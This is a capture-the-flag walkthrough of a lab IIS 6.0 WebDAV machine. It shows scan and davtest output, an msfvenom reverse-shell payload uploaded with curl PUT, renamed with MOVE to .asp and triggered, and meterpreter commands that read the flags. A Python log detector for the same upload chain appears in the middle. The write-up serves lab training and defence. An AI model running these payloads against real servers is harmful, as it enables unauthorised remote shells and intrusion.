Basic information

Port scan

Only port 80 is open:

$ nmap -sC -sV 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 13:29 CST
Nmap scan report for 10.10.10.15
Host is up (0.068s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-ntlm-info:
| Target_Name: GRANNY
| NetBIOS_Domain_Name: GRANNY
| NetBIOS_Computer_Name: GRANNY
| DNS_Domain_Name: granny
| DNS_Computer_Name: granny
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Date: Fri, 25 Dec 2020 05:30:23 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
| Server Type: Microsoft-IIS/6.0
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.88 seconds

80

The IIS default page:

WebDAV

The environment is basically the same as Grandpa, so this time we go in a different way, through WebDAV:

davtest

davtest shows that asp cannot be PUT directly, but txt can be PUT and then renamed with MOVE:

➜  ~ davtest --url http://10.10.10.15
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: 6YBKu7grFOa_YTc
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc
********************************************************
Sending test files
PUT php SUCCEED: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.php
PUT asp FAIL
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.cfm
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.pl
PUT aspx FAIL
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.jhtml
PUT cgi FAIL
PUT html SUCCEED: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.html
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.txt
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.jsp
PUT shtml FAIL
********************************************************
Checking for test file execution
EXEC php FAIL
EXEC cfm FAIL
EXEC pl FAIL
EXEC jhtml FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.html
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.txt
EXEC jsp FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.php
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.cfm
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.pl
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.jhtml
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.html
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.txt
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.jsp
Executes: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.html
Executes: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.txt

exploit

So generate an asp shell with msf, PUT it, MOVE it, and request it to trigger:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4445 -f asp > miao.txt
# msfvenom -p windows/meterpreter/reverse_tcp_allports LHOST=10.10.14.6 LPORT=4445 -f asp > miao.txt
curl -T 'miao.txt' http://10.10.10.15/miao.txt # upload the txt file to the granny server
curl -X MOVE --header 'Destination:http://10.10.10.15/miao.asp' 'http://10.10.10.15/miao.txt' # rename txt to asp
curl 'http://10.10.10.15/miao.asp' # request the asp file to trigger the shell
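The PUT-then-MOVE rename used above is exactly the sequence a defender should be hunting for in the IIS access logs. The following is an added example, not code from the original writeup: it parses a handful of constructed IIS W3C log lines (the client IPs, paths, timestamps and user agents are made up to mirror the commands above) and flags two things: any WebDAV write method reaching the server, and a PUT followed by a MOVE followed by a GET of an .asp/.aspx resource from the same client.

```python
from collections import defaultdict

# Constructed IIS W3C log excerpt (not from the original writeup). The field
# order follows the common default "#Fields:" layout of IIS W3C logging.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2020-12-25 05:30:01 10.10.10.15 GET /Default.htm - 80 - 10.10.14.9 Mozilla/5.0 200 0 0
2020-12-25 05:31:10 10.10.10.15 OPTIONS / - 80 - 10.10.14.6 curl/7.74.0 200 0 0
2020-12-25 05:31:12 10.10.10.15 PUT /miao.txt - 80 - 10.10.14.6 curl/7.74.0 201 0 0
2020-12-25 05:31:15 10.10.10.15 MOVE /miao.txt - 80 - 10.10.14.6 curl/7.74.0 201 0 0
2020-12-25 05:31:20 10.10.10.15 GET /miao.asp - 80 - 10.10.14.6 curl/7.74.0 200 0 0
2020-12-25 05:32:00 10.10.10.15 PROPFIND / - 80 - 10.10.14.9 Microsoft-WebDAV-MiniRedir 207 0 0
"""

# WebDAV methods that create, change or rename content on the server.
WEBDAV_WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH", "LOCK", "UNLOCK"}

# Extensions that IIS hands to a script engine rather than serving as static files.
SCRIPT_EXTENSIONS = (".asp", ".aspx")


def parse_w3c(text):
    """Parse W3C extended log text into a list of dicts keyed by the #Fields names."""
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any #Fields header
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line; skip rather than misalign columns
        rows.append(dict(zip(fields, parts)))
    return rows


def find_webdav_writes(rows):
    """Return (client, method, path, status) for every WebDAV write request."""
    return [
        (r["c-ip"], r["cs-method"], r["cs-uri-stem"], r["sc-status"])
        for r in rows
        if r["cs-method"] in WEBDAV_WRITE_METHODS
    ]


def find_rename_chains(rows):
    """Flag clients that PUT a file, MOVE it, and then GET a script-mapped resource.

    The default W3C field set does not record the Destination header, so the
    MOVE target is invisible in the log; the subsequent GET of an .asp/.aspx
    path from the same client is what ties the chain together.
    """
    state = defaultdict(lambda: {"put": False, "move": False})
    alerts = []
    for r in rows:
        ip, method, uri, status = r["c-ip"], r["cs-method"], r["cs-uri-stem"], r["sc-status"]
        ok = status.startswith("2")  # 201 Created / 204 No Content for WebDAV writes
        if method == "PUT" and ok:
            state[ip]["put"] = True
        elif method == "MOVE" and ok and state[ip]["put"]:
            state[ip]["move"] = True
        elif method == "GET" and state[ip]["move"] and uri.lower().endswith(SCRIPT_EXTENSIONS):
            alerts.append((ip, uri))
            state[ip] = {"put": False, "move": False}
    return alerts


if __name__ == "__main__":
    rows = parse_w3c(SAMPLE_LOG)
    for hit in find_webdav_writes(rows):
        print("webdav write:", hit)
    for ip, uri in find_rename_chains(rows):
        print(f"ALERT: {ip} uploaded, renamed and then requested {uri}")
```

On the constructed input this reports the PUT and MOVE from 10.10.14.6 as WebDAV writes and raises one chain alert for /miao.asp; the PROPFIND from the other client is read-only and is not flagged. Real IIS logs replace spaces in the user agent with `+`, so whitespace splitting on the default fields is safe.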

Privilege escalation

Privilege escalation is the same as well: run post/multi/recon/local_exploit_suggester, then pick any one of the suggestions:

flags

Then just read the flags:

meterpreter > search -f user.txt
Found 1 result...
c:\Documents and Settings\Lakis\Desktop\user.txt (32 bytes)
meterpreter > search -f root.txt
Found 1 result...
c:\Documents and Settings\Administrator\Desktop\root.txt (32 bytes)
meterpreter > cd 'c:\Documents and Settings'
meterpreter > cat Lakis/Desktop/user.txt
meterpreter > cat Administrator/Desktop/root.txt

References